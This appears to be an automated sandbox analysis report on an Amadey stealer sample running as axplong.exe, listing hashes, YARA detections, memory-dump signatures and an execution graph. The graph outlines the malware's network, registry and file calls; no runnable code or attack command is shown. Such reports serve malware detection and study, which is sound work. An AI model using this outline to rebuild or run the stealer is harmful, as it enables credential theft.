                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  Imagebase:0x1000000
                  File size:1'942'016 bytes
                  MD5 hash:EAA443F37443CB7221D63E0891243384
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1699386717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 73%, ReversingLabs
                  Reputation:low
                  Has exited:false

                  Target ID:2
                  Start time:18:25:00
                  Start date:01/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                  Imagebase:0x1000000
                  File size:1'942'016 bytes
                  MD5 hash:EAA443F37443CB7221D63E0891243384
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1740305349.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1699458271.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Reset < >
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 57cec124f60ad98d5d16e41d3ac8b59856779ea0284c72d0fc41967f55695339
                    • Instruction ID: 513fa2d7b55283f19d253b0f1da20074473532298c4dc6667f082670ec16793d
                    • Opcode Fuzzy Hash: 57cec124f60ad98d5d16e41d3ac8b59856779ea0284c72d0fc41967f55695339
                    • Instruction Fuzzy Hash: 5401C2AB34C530BEA101A4891B145BB663EB2DE231730C4A6F75FC4503F19826597331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7733a53f9c9c19ebbddf0301b145264f5675d3ed5d1042eb5039df49200d25d4
                    • Instruction ID: 027671335021bfada868af44c99b1116be59ab92550ec4a443b22c2de9549806
                    • Opcode Fuzzy Hash: 7733a53f9c9c19ebbddf0301b145264f5675d3ed5d1042eb5039df49200d25d4
                    • Instruction Fuzzy Hash: 3A21F7AB24C531BEA202A5951B545B77B3AE5DE231330C4E6F74FC9503F199264D6332
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1b71e7fc3fdaaf0ddae67705025a258636314c891b744a72810adc7604fdc52
                    • Instruction ID: ef13525bb5b8ab2233d570d481a9c563e7efe4f0c88e5ded946edc7c49123f9b
                    • Opcode Fuzzy Hash: b1b71e7fc3fdaaf0ddae67705025a258636314c891b744a72810adc7604fdc52
                    • Instruction Fuzzy Hash: C81172BB34C531BE6101A5861B549BB673EF5DA231330C4A6F75FD5403F29426597331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5dce2d1928164b82c074fa68d8f7af325b7e92af69573bb8b2c2e516cc84da0b
                    • Instruction ID: 8b20c347de9fefa0c5f2f0f6a95e40d1fd05a67f4b15ecd7804ab6b67c7b81a9
                    • Opcode Fuzzy Hash: 5dce2d1928164b82c074fa68d8f7af325b7e92af69573bb8b2c2e516cc84da0b
                    • Instruction Fuzzy Hash: A91124AB34C531EEA101A9961B50AF76B3AE7DE230731C89AF78FC5013F194664A7331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 90ce41c06226eb8a7367430bf16f84aea7532dfdb0731b4f45d6a8569c94dc89
                    • Instruction ID: 2d0b40f9d3be3dbd07efdb138ebbd3d44bc552160598063dbf618cfcbd776b27
                    • Opcode Fuzzy Hash: 90ce41c06226eb8a7367430bf16f84aea7532dfdb0731b4f45d6a8569c94dc89
                    • Instruction Fuzzy Hash: 9C11D3AB34C531BDA101A58617146FB6B3AF6DA231730C4A6F75FC4513F19422597371
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 575da01ecc575928a5ceda70367430ab050c4dd1718fdf811e34135e8c353cb6
                    • Instruction ID: 59e654ff3eab2ca892e727267c9bac6396849290e3ffe24a2043e43732c4c34d
                    • Opcode Fuzzy Hash: 575da01ecc575928a5ceda70367430ab050c4dd1718fdf811e34135e8c353cb6
                    • Instruction Fuzzy Hash: F601C4B734C530BEA101B9891B149BB763EE6DA231730C5A6FB5FD4003F29866597331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f72d46784e75a76a1755489a1e0dc2e758e795f9e65101b97f2c05807566114
                    • Instruction ID: 47eb39dff545a0c266df1afddc19120a7b463aeb5210c23872e8678534e41ed0
                    • Opcode Fuzzy Hash: 1f72d46784e75a76a1755489a1e0dc2e758e795f9e65101b97f2c05807566114
                    • Instruction Fuzzy Hash: 6F01D2A734C530BD6102A8891B54ABA6B3EF6DA231330C4A6FB5FD4503F28866197331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5c3fdef7430b485d14f48d46914f00e0333b5f9c43aba0e81bb943808f60f5d3
                    • Instruction ID: 3cc1eb14110b29f120906ce46559315c44a7f886a9474b448a6edc8a7fb09798
                    • Opcode Fuzzy Hash: 5c3fdef7430b485d14f48d46914f00e0333b5f9c43aba0e81bb943808f60f5d3
                    • Instruction Fuzzy Hash: A1019EB734C531BDA201A4992B55AFAA63EE1DA230370C0A6F61BC1503F28852593231
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db6991e1af1125523e682605a38cd68c0718e0f4be95d4fcefa0a8db5b8934d2
                    • Instruction ID: e4a0d21c7bf37e880257b471a93ddec19d7623acaaad99bed1098cc2ce454e9a
                    • Opcode Fuzzy Hash: db6991e1af1125523e682605a38cd68c0718e0f4be95d4fcefa0a8db5b8934d2
                    • Instruction Fuzzy Hash: EA01B1AB34C530BDA101A4992B15AFA673EF1DA231330C5A6F75FD4903F288260E7332
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b99c2e31f4617016cecdc8696c1f3cf66796b066a34e3898ddd2d26662315d1
                    • Instruction ID: 6a2627bc51962d1610bc639be8e0fccb1e13d19bae3a28ad1a73a7227c42c27f
                    • Opcode Fuzzy Hash: 0b99c2e31f4617016cecdc8696c1f3cf66796b066a34e3898ddd2d26662315d1
                    • Instruction Fuzzy Hash: 91F044A734C531BD7101A5992B15AF6673EE1D6231370C4A7F71FD0503B188175D3232
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ac94267b12d1d82862e74989b0a56e24e1191f89ab4c3ea04cfe2778aa60c61
                    • Instruction ID: e8bd41886d5da698491934d66ea4c71b0dff233ae5901889ef0eb5c8b87619f5
                    • Opcode Fuzzy Hash: 6ac94267b12d1d82862e74989b0a56e24e1191f89ab4c3ea04cfe2778aa60c61
                    • Instruction Fuzzy Hash: A7F062AB34C531BD7001A59A2B156BA673EE2D6231330C5A7F65FD0503B188171E3232
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 27e55b5e152a04f6f552d367973efbdb7bc85c8de785f71d498fc704f2dea367
                    • Instruction ID: 8d8383bf183c4fc8255d9ede8096bb786db37dc37dddcbd138dd41b81f751c69
                    • Opcode Fuzzy Hash: 27e55b5e152a04f6f552d367973efbdb7bc85c8de785f71d498fc704f2dea367
                    • Instruction Fuzzy Hash: 56F0C2AB34C930BCB001A98A2B159BA673EE1D6231370C5A7F65FD0503F288271E3332
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 488beb24d954254fd6e8b62ad246d765afcff492dba28f1880546a7ef0b11f8f
                    • Instruction ID: 1e38033288f594fd3d0cf6f858678b5bc6ffc762d87159ab3df854289880054b
                    • Opcode Fuzzy Hash: 488beb24d954254fd6e8b62ad246d765afcff492dba28f1880546a7ef0b11f8f
                    • Instruction Fuzzy Hash: DDF0BBA734C9309ED102E95967652F5AB39A79A231730C5A2F35FD2653B1C8234E7331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cce1fb87a465fd5ba65acbdba48d74a3be2b5d895e6eda484256e465432ab355
                    • Instruction ID: 14dc315f70ef73093cbb8e3efa82c3c5c67446be5b3b2934ab5ff68593ff3da3
                    • Opcode Fuzzy Hash: cce1fb87a465fd5ba65acbdba48d74a3be2b5d895e6eda484256e465432ab355
                    • Instruction Fuzzy Hash: A8F0E06734C9309D9101A55967552F56B39A7DA231630C5A2F35FD1543B1CC134E7332
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f40c5b5cd6e6470b9193c0e694c43e2b6c68b8adf587584a62f8b8da742b25f3
                    • Instruction ID: 5178b3f6a59318325c5e1f4bc5c516f71355d1fd7832365c24a280deb18cb876
                    • Opcode Fuzzy Hash: f40c5b5cd6e6470b9193c0e694c43e2b6c68b8adf587584a62f8b8da742b25f3
                    • Instruction Fuzzy Hash: D1F0273378CA609E8201E9A993451357B35B65E136330C0AAF35FC1513A1481219B322
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e872406a5d923cd3abb9f2a3dd479c2f184561e8e1535df8f3cb862c82f66526
                    • Instruction ID: 2e93e9f78fe72323bd968dff26940886fcca12a7cbffbdc46ad27f0b8ab79dbc
                    • Opcode Fuzzy Hash: e872406a5d923cd3abb9f2a3dd479c2f184561e8e1535df8f3cb862c82f66526
                    • Instruction Fuzzy Hash: A4F0272368CE308DC242F69D43052357A36B79A232734C1A7E36FC0903B148225DB322
                    Memory Dump Source
                    • Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4b20000_setup.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a24ec99e49fb2e6a43211abb88a4b288f5fc55eece4d070ec82b255dc111cfb
                    • Instruction ID: b11fc4f290d12dfaa0d160d2b2c1118b83fbd2b16c6d6034c94125730eddbd84
                    • Opcode Fuzzy Hash: 6a24ec99e49fb2e6a43211abb88a4b288f5fc55eece4d070ec82b255dc111cfb
                    • Instruction Fuzzy Hash: 49E0D88278CE30558182345D07482756A39A6AF036230C2E2E3AF94A53B48D235A7361

                    Execution Graph

                    Execution Coverage:6.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:6.2%
                    Total number of Nodes:600
                    Total number of Limit Nodes:43
                    execution_graph 13045 100dfa0 recv 13046 100e002 recv 13045->13046 13047 100e037 recv 13046->13047 13048 100e071 13047->13048 13049 100e193 13048->13049 13050 101c5af GetSystemTimePreciseAsFileTime 13048->13050 13051 100e1ce 13050->13051 13052 101c16d 10 API calls 13051->13052 13053 100e238 13052->13053 13088 10073e0 13089 1007415 shared_ptr 13088->13089 13091 100750f shared_ptr 13089->13091 13094 101d017 13089->13094 13092 100759d 13092->13091 13098 101cfcd 13092->13098 13097 101d028 13094->13097 13095 101d030 13095->13092 13097->13095 13102 101d09f 13097->13102 13100 101cfdc 13098->13100 13099 101d085 13099->13091 13100->13099 13101 101d081 RtlWakeAllConditionVariable 13100->13101 13101->13091 13103 101d0ad SleepConditionVariableCS 13102->13103 13105 101d0c6 13102->13105 13103->13105 13105->13097 13106 100e3e0 13107 100e405 13106->13107 13109 100e3e9 13106->13109 13109->13107 13110 100e240 13109->13110 13111 100e250 __dosmaperr 13110->13111 13112 1038959 4 API calls 13111->13112 13114 100e28d std::_Xinvalid_argument 13112->13114 13113 100e405 13113->13109 13114->13113 13115 100e240 4 API calls 13114->13115 13115->13114 12599 1011da0 12602 1011e3b shared_ptr __dosmaperr 12599->12602 12600 1011e48 12601 100e410 6 API calls 12600->12601 12603 1012906 shared_ptr std::_Xinvalid_argument 12601->12603 12602->12600 12602->12603 12616 1038959 12602->12616 12608 1012235 shared_ptr 12608->12603 12620 1036639 12608->12620 12609 101265b shared_ptr __dosmaperr 12609->12603 12610 1038959 4 API calls 12609->12610 12611 1012729 12610->12611 12611->12600 12611->12603 12612 10127a1 12611->12612 12627 100e410 12612->12627 12614 1012813 12614->12603 12645 1005dd0 12614->12645 12617 1038974 12616->12617 12652 10386b7 12617->12652 12619 103897e 12619->12608 12742 1036582 12620->12742 12622 101264a 12622->12600 12623 10366c7 12622->12623 12624 10366d3 12623->12624 12626 10366dd __cftof __dosmaperr 12624->12626 12758 1036650 12624->12758 12626->12609 12628 100e459 12627->12628 12781 100bd30 12628->12781 12630 100e979 shared_ptr 12630->12614 12631 100e6e1 12631->12630 12632 100e410 6 API calls 12631->12632 12634 100f666 12632->12634 12633 100f862 shared_ptr 12633->12614 12634->12633 12635 100e410 6 API calls 12634->12635 12637 100f943 12635->12637 12636 100fa15 shared_ptr 12636->12614 12637->12636 12638 1036639 RtlAllocateHeap 12637->12638 12639 100fbc1 12638->12639 12640 100e410 6 API calls 12639->12640 12642 101051c 12640->12642 12641 1010760 shared_ptr 12641->12614 12642->12641 12643 100e410 6 API calls 12642->12643 12644 10111c9 12643->12644 12647 1005e08 12645->12647 12646 1005eee shared_ptr 12646->12603 12647->12646 12648 1006040 RegOpenKeyExA 12647->12648 12650 100643a shared_ptr 12648->12650 12651 1006093 __cftof 12648->12651 12649 1006133 RegEnumValueW 12649->12651 12650->12603 12651->12649 12651->12650 12653 10386c9 12652->12653 12657 10386de __cftof __dosmaperr 12653->12657 12658 103681a 12653->12658 12656 103870e 12656->12657 12664 1038905 12656->12664 12657->12619 12659 103683a 12658->12659 12663 1036831 12658->12663 12659->12663 12670 103b49b 12659->12670 12663->12656 12665 1038942 12664->12665 12666 1038912 12664->12666 12735 103d2c9 12665->12735 12668 1038921 __fassign 12666->12668 12730 103d2ed 12666->12730 12668->12656 12671 103b4ae 12670->12671 12673 1036870 12670->12673 12671->12673 12678 103f44b 12671->12678 12674 103b4c8 12673->12674 12675 103b4f0 12674->12675 12676 103b4db 12674->12676 12675->12663 12676->12675 12713 103e551 12676->12713 12679 103f457 __fassign 12678->12679 12680 103f4a6 12679->12680 12683 1038a8f 12679->12683 12680->12673 12682 103f4cb 12684 1038a94 __fassign 12683->12684 12687 1038a9f 12684->12687 12694 103d4d4 12684->12694 12691 10364fd 12687->12691 12688 103d707 RtlAllocateHeap 12689 103d71a __dosmaperr 12688->12689 12690 1038ad2 __fassign 12688->12690 12689->12682 12690->12688 12690->12689 12701 10363d7 12691->12701 12695 103d4e0 __fassign 12694->12695 12696 10364fd __fassign 2 API calls 12695->12696 12700 103d53c __cftof __dosmaperr __fassign 12695->12700 12699 103d6ce __fassign 12696->12699 12697 103d707 RtlAllocateHeap 12698 103d71a __dosmaperr 12697->12698 12697->12699 12698->12687 12699->12697 12699->12698 12700->12687 12702 10363e5 __fassign 12701->12702 12703 1036430 12702->12703 12706 103643b 12702->12706 12703->12690 12711 103a1a2 GetPEB 12706->12711 12708 1036445 12709 103644a GetPEB 12708->12709 12710 103645a __fassign 12708->12710 12709->12710 12712 103a1bc __fassign 12711->12712 12712->12708 12714 103e55b 12713->12714 12717 103e469 12714->12717 12716 103e561 12716->12675 12718 103e475 __freea __fassign 12717->12718 12719 103e496 12718->12719 12720 1038a8f __fassign 4 API calls 12718->12720 12719->12716 12721 103e508 12720->12721 12722 103e544 12721->12722 12726 103a5ce 12721->12726 12722->12716 12727 103a5f1 12726->12727 12728 1038a8f __fassign 4 API calls 12727->12728 12729 103a667 12728->12729 12731 103681a __fassign 4 API calls 12730->12731 12732 103d30a 12731->12732 12734 103d31a 12732->12734 12739 103f05f 12732->12739 12734->12668 12736 103d2d4 12735->12736 12737 103b49b __fassign 4 API calls 12736->12737 12738 103d2e4 12737->12738 12738->12668 12740 103681a __fassign 4 API calls 12739->12740 12741 103f07f __cftof __fassign __freea 12740->12741 12741->12734 12743 103658e 12742->12743 12744 1036595 __cftof __dosmaperr 12743->12744 12746 103a763 12743->12746 12744->12622 12747 103a76f 12746->12747 12750 103a807 12747->12750 12749 103a78a 12749->12744 12752 103a82a 12750->12752 12752->12752 12753 103a870 __freea 12752->12753 12754 103d6cf 12752->12754 12753->12749 12757 103d6dc __fassign 12754->12757 12755 103d707 RtlAllocateHeap 12756 103d71a __dosmaperr 12755->12756 12755->12757 12756->12753 12757->12755 12757->12756 12759 1036672 12758->12759 12761 103665d __cftof __dosmaperr __freea 12758->12761 12759->12761 12762 1039ed9 12759->12762 12761->12626 12763 1039f16 12762->12763 12764 1039ef1 12762->12764 12763->12761 12764->12763 12766 10402d8 12764->12766 12767 10402e4 12766->12767 12769 10402ec __cftof __dosmaperr 12767->12769 12770 10403ca 12767->12770 12769->12763 12771 10403ec 12770->12771 12773 10403f0 __cftof __dosmaperr 12770->12773 12771->12773 12774 103fb5f 12771->12774 12773->12769 12775 103fbac 12774->12775 12776 103681a __fassign 4 API calls 12775->12776 12779 103fbbb __cftof 12776->12779 12777 103d2c9 4 API calls 12777->12779 12778 103fe5b 12778->12773 12779->12777 12779->12778 12780 103c4ca GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 12779->12780 12780->12779 12782 100bd82 12781->12782 12785 100c11e shared_ptr 12781->12785 12783 100bd96 InternetOpenW InternetConnectA 12782->12783 12782->12785 12784 100be0d 12783->12784 12786 100be23 HttpOpenRequestA 12784->12786 12785->12631 12787 100be41 shared_ptr 12786->12787 12788 100bee3 HttpSendRequestA 12787->12788 12790 100befb shared_ptr 12788->12790 12789 100bf83 InternetReadFile 12791 100bfaa 12789->12791 12790->12789 13315 10192e0 13316 10192f5 13315->13316 13317 1019333 13315->13317 13318 101d017 SleepConditionVariableCS 13316->13318 13319 10192ff 13318->13319 13319->13317 13320 101cfcd RtlWakeAllConditionVariable 13319->13320 13320->13317 12792 1036bcb 12799 1036bd7 12792->12799 12793 1038a8f __fassign 4 API calls 12794 1036c06 12793->12794 12795 1036c23 12794->12795 12796 1036c15 12794->12796 12804 103689d 12795->12804 12797 1036c79 9 API calls 12796->12797 12800 1036c1f 12797->12800 12799->12793 12801 1036c3d 12802 1036c51 __freea 12801->12802 12807 1036c79 12801->12807 12805 103681a __fassign 4 API calls 12804->12805 12806 10368af 12805->12806 12806->12801 12808 1036ca4 __cftof 12807->12808 12814 1036c87 __cftof __dosmaperr 12807->12814 12809 1036ce6 CreateFileW 12808->12809 12815 1036cca __cftof __dosmaperr 12808->12815 12810 1036d0a 12809->12810 12811 1036d18 12809->12811 12816 1036de1 GetFileType 12810->12816 12830 1036d57 12811->12830 12814->12802 12815->12802 12817 1036e1c 12816->12817 12822 1036eb2 __dosmaperr 12816->12822 12818 1036e36 __cftof 12817->12818 12852 1037157 12817->12852 12820 1036e55 GetFileInformationByHandle 12818->12820 12818->12822 12821 1036e6b 12820->12821 12820->12822 12838 10370a9 12821->12838 12822->12815 12826 1036e88 12827 1036f51 SystemTimeToTzSpecificLocalTime 12826->12827 12828 1036e9b 12827->12828 12829 1036f51 SystemTimeToTzSpecificLocalTime 12828->12829 12829->12822 12871 10372f4 12830->12871 12832 1036d65 12833 1036d6a __dosmaperr 12832->12833 12834 10370a9 4 API calls 12832->12834 12833->12815 12835 1036d83 12834->12835 12836 1037157 RtlAllocateHeap 12835->12836 12837 1036da2 12836->12837 12837->12815 12840 10370bf _wcsrchr 12838->12840 12839 1036e77 12848 1036f51 12839->12848 12840->12839 12856 103b9c4 12840->12856 12842 1037103 12842->12839 12843 103b9c4 4 API calls 12842->12843 12844 1037114 12843->12844 12844->12839 12845 103b9c4 4 API calls 12844->12845 12846 1037125 12845->12846 12846->12839 12847 103b9c4 4 API calls 12846->12847 12847->12839 12849 1036f69 12848->12849 12850 1036f89 SystemTimeToTzSpecificLocalTime 12849->12850 12851 1036f6f 12849->12851 12850->12851 12851->12826 12853 1037170 12852->12853 12855 1037184 __dosmaperr 12853->12855 12867 103b548 12853->12867 12855->12818 12858 103b9d2 12856->12858 12860 103b9d8 __cftof __dosmaperr 12858->12860 12861 103ba0d 12858->12861 12859 103ba08 12859->12842 12860->12842 12862 103ba37 12861->12862 12864 103ba1d __cftof __dosmaperr 12861->12864 12863 103681a __fassign 4 API calls 12862->12863 12862->12864 12866 103ba61 12863->12866 12864->12859 12865 103b985 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12865->12866 12866->12864 12866->12865 12868 103b572 __cftof 12867->12868 12869 103d6cf RtlAllocateHeap 12868->12869 12870 103b58e __dosmaperr __freea 12868->12870 12869->12870 12870->12855 12872 1037318 12871->12872 12874 103731e 12872->12874 12875 1037016 12872->12875 12874->12832 12876 1037022 __dosmaperr 12875->12876 12881 103b85b 12876->12881 12878 1037048 12878->12874 12879 103703a __dosmaperr 12879->12878 12880 103b85b RtlAllocateHeap 12879->12880 12880->12878 12884 103b6be 12881->12884 12883 103b874 12883->12879 12885 103b6ce 12884->12885 12887 103b6d5 12885->12887 12888 1041ed8 12885->12888 12887->12883 12891 1041d02 12888->12891 12890 1041eef 12890->12887 12892 1041d34 12891->12892 12894 1041d20 __cftof __dosmaperr 12891->12894 12893 103b548 RtlAllocateHeap 12892->12893 12892->12894 12893->12894 12894->12890 12895 103d6cf 12898 103d6dc __fassign 12895->12898 12896 103d707 RtlAllocateHeap 12897 103d71a __dosmaperr 12896->12897 12896->12898 12898->12896 12898->12897 13116 101b82e 13117 101b6b5 11 API calls 13116->13117 13118 101b856 13117->13118 13119 101b618 11 API calls 13118->13119 13120 101b86f 13119->13120 13121 1008690 13122 1008696 13121->13122 13123 1036639 RtlAllocateHeap 13122->13123 13124 10086a3 13123->13124 13125 10086b6 13124->13125 13126 10366c7 4 API calls 13124->13126 13127 10086b0 13126->13127 12899 101a110 12900 101a190 12899->12900 12906 1017010 12900->12906 12902 101a1cc shared_ptr 12903 101a3be shared_ptr 12902->12903 12910 1003de0 12902->12910 12905 101a3a6 12908 1017051 __cftof __Mtx_init_in_situ 12906->12908 12907 1017286 12907->12902 12908->12907 12916 1002dc0 12908->12916 12911 1003e48 12910->12911 12912 1003e1e 12910->12912 12913 1003e58 12911->12913 13007 1002b00 12911->13007 12912->12905 12913->12905 12917 1002e06 12916->12917 12920 1002e6f 12916->12920 12950 101c5af 12917->12950 12921 1002eef 12920->12921 12927 101c5af GetSystemTimePreciseAsFileTime 12920->12927 12921->12907 12922 1002f1e 12953 101c16d 12922->12953 12924 1002f24 12926 101c16d 10 API calls 12924->12926 12925 1002e1d __Mtx_unlock 12925->12920 12925->12924 12928 1002eb9 12926->12928 12927->12928 12929 101c16d 10 API calls 12928->12929 12930 1002ec0 __Mtx_unlock 12928->12930 12929->12930 12931 101c16d 10 API calls 12930->12931 12933 1002ed8 __Cnd_broadcast 12930->12933 12931->12933 12932 101c16d 10 API calls 12934 1002f3c 12932->12934 12933->12921 12933->12932 12935 101c5af GetSystemTimePreciseAsFileTime 12934->12935 12939 1002f80 shared_ptr __Mtx_unlock 12935->12939 12936 10030c5 12937 101c16d 10 API calls 12936->12937 12938 10030cb 12937->12938 12940 101c16d 10 API calls 12938->12940 12939->12936 12939->12938 12946 10030a7 12939->12946 12947 101c5af GetSystemTimePreciseAsFileTime 12939->12947 12941 10030d1 12940->12941 12942 101c16d 10 API calls 12941->12942 12943 1003093 __Mtx_unlock 12942->12943 12944 101c16d 10 API calls 12943->12944 12943->12946 12945 10030dd 12944->12945 12946->12907 12948 100305f 12947->12948 12948->12936 12948->12941 12948->12943 12957 101bc4c 12948->12957 12960 101c355 12950->12960 12952 1002e12 12952->12922 12952->12925 12954 101c195 12953->12954 12955 101c177 12953->12955 12954->12954 12955->12954 12977 101c19a 12955->12977 13001 101ba72 12957->13001 12959 101bc5c 12959->12948 12961 101c3ab 12960->12961 12963 101c37d 12960->12963 12961->12963 12966 101ce6e 12961->12966 12963->12952 12964 101c400 __Xtime_diff_to_millis2 12964->12963 12965 101ce6e _xtime_get GetSystemTimePreciseAsFileTime 12964->12965 12965->12964 12967 101ce7d 12966->12967 12969 101ce8a __aulldvrm 12966->12969 12967->12969 12970 101ce47 12967->12970 12969->12964 12973 101caed 12970->12973 12974 101cb0a 12973->12974 12975 101cafe GetSystemTimePreciseAsFileTime 12973->12975 12974->12969 12975->12974 12980 10029e0 12977->12980 12979 101c1b1 std::_Throw_future_error 12979->12955 12994 101bddf 12980->12994 12982 10029ff 12982->12979 12983 1038a8f __fassign 4 API calls 12984 1036c06 12983->12984 12985 1036c23 12984->12985 12986 1036c15 12984->12986 12988 103689d 4 API calls 12985->12988 12987 1036c79 9 API calls 12986->12987 12990 1036c1f 12987->12990 12992 1036c3d 12988->12992 12989 10029f4 12989->12982 12989->12983 12990->12979 12991 1036c51 __freea 12991->12979 12992->12991 12993 1036c79 9 API calls 12992->12993 12993->12991 12997 101cb34 12994->12997 12998 101cb42 InitOnceExecuteOnce 12997->12998 13000 101bdf2 12997->13000 12998->13000 13000->12989 13002 101ba9c 13001->13002 13003 101ce6e _xtime_get GetSystemTimePreciseAsFileTime 13002->13003 13006 101baa4 __Xtime_diff_to_millis2 13002->13006 13004 101bacf __Xtime_diff_to_millis2 13003->13004 13005 101ce6e 